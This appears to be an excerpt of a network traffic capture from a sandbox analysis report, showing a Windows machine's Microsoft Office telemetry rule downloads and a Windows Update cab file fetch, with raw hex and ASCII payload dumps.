                                              2024-10-25 13:45:56 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              46192.168.2.44979213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:56 UTC192OUTGET /rules/rule120627v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:56 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 404
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT
                                              ETag: "0x8DC582B9E8EE0F3"
                                              x-ms-request-id: 5074b8ce-701e-005c-627a-25bb94000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-15b8d89586fzhrwgk23ex2bvhw00000003bg000000006x75
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:56 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              47192.168.2.44979313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:56 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:57 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:56 GMT
                                              Content-Type: text/xml
                                              Content-Length: 468
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                              ETag: "0x8DC582B9C8E04C8"
                                              x-ms-request-id: 00f7314e-e01e-0052-48ac-21d9df000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134556Z-16849878b786fl7gm2qg4r5y7000000000y0000000006gqq
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:57 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              48192.168.2.44979413.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:57 UTC192OUTGET /rules/rule120629v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:57 UTC498INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:57 GMT
                                              Content-Type: text/xml
                                              Content-Length: 428
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                              ETag: "0x8DC582BAC4F34CA"
                                              x-ms-request-id: 67fffc2c-401e-000a-5dae-264a7b000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134557Z-16849878b78z5q7jpbgf6e9mcw00000009c000000000cxgx
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache-Info: L2_T2
                                              X-Cache: TCP_REMOTE_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:57 UTC428INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              49192.168.2.44979513.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:57 UTC192OUTGET /rules/rule120630v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:58 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:57 GMT
                                              Content-Type: text/xml
                                              Content-Length: 499
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT
                                              ETag: "0x8DC582B98CEC9F6"
                                              x-ms-request-id: 6ff76e76-001e-002b-21c5-2099f2000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134557Z-16849878b785f8wh85a0w3ennn000000094000000000q6zu
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:58 UTC499INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              50192.168.2.44979713.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:57 UTC192OUTGET /rules/rule120632v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:58 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:57 GMT
                                              Content-Type: text/xml
                                              Content-Length: 471
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                              ETag: "0x8DC582BB5815C4C"
                                              x-ms-request-id: 43148558-a01e-0098-6adf-258556000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134557Z-15b8d89586fnsf5zd126eyaetw00000001rg000000009v48
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:58 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              51192.168.2.44979813.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:57 UTC192OUTGET /rules/rule120631v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:58 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:57 GMT
                                              Content-Type: text/xml
                                              Content-Length: 415
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                              ETag: "0x8DC582B988EBD12"
                                              x-ms-request-id: ff743265-301e-000c-1ff2-24323f000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134557Z-r197bdfb6b4t7wszkhsu1pyev000000001m000000000a60d
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:58 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              52192.168.2.44979913.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:58 UTC192OUTGET /rules/rule120633v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:58 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:58 GMT
                                              Content-Type: text/xml
                                              Content-Length: 419
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                              ETag: "0x8DC582BB32BB5CB"
                                              x-ms-request-id: 2760be74-301e-0096-200b-26e71d000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134558Z-16849878b786lft2mu9uftf3y400000001w000000000asbf
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:58 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              53192.168.2.44979620.12.23.50443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:58 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=76n2YYww4aHFrFc&MD=O4CPbXYe HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept: */*
                                              User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                              Host: slscr.update.microsoft.com
                                              2024-10-25 13:45:58 UTC560INHTTP/1.1 200 OK
                                              Cache-Control: no-cache
                                              Pragma: no-cache
                                              Content-Type: application/octet-stream
                                              Expires: -1
                                              Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                              ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                              MS-CorrelationId: b8e7d97d-314a-417e-9c55-98cc6bce42a8
                                              MS-RequestId: f893e063-6a15-4047-b0f3-6ea872ce0c61
                                              MS-CV: YRtiwbkcwkCv5CJm.0
                                              X-Microsoft-SLSClientCache: 1440
                                              Content-Disposition: attachment; filename=environment.cab
                                              X-Content-Type-Options: nosniff
                                              Date: Fri, 25 Oct 2024 13:45:57 GMT
                                              Connection: close
                                              Content-Length: 30005
                                              2024-10-25 13:45:58 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                              2024-10-25 13:45:58 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              54192.168.2.44980013.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:58 UTC192OUTGET /rules/rule120634v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:58 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:58 GMT
                                              Content-Type: text/xml
                                              Content-Length: 494
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                              ETag: "0x8DC582BB8972972"
                                              x-ms-request-id: 999b7e79-701e-001e-6bf4-24f5e6000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134558Z-r197bdfb6b4kq4j5t834fh90qn0000000csg00000000024h
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:58 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              55192.168.2.44980213.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:58 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:58 GMT
                                              Content-Type: text/xml
                                              Content-Length: 420
                                              Connection: close
                                              Cache-Control: public, max-age=604800, immutable
                                              Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                              ETag: "0x8DC582B9DAE3EC0"
                                              x-ms-request-id: 06960f57-101e-000b-0c20-265e5c000000
                                              x-ms-version: 2018-03-28
                                              x-azure-ref: 20241025T134558Z-r197bdfb6b4hsj5bywyqk9r2xw00000001y000000000bf07
                                              x-fd-int-roxy-purgeid: 0
                                              X-Cache: TCP_HIT
                                              Accept-Ranges: bytes
                                              2024-10-25 13:45:59 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                              Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              56192.168.2.44980313.107.246.45443
                                              TimestampBytes transferredDirectionData
                                              2024-10-25 13:45:58 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                              Connection: Keep-Alive
                                              Accept-Encoding: gzip
                                              User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                              Host: otelrules.azureedge.net
                                              2024-10-25 13:45:59 UTC470INHTTP/1.1 200 OK
                                              Date: Fri, 25 Oct 2024 13:45:58 GMT
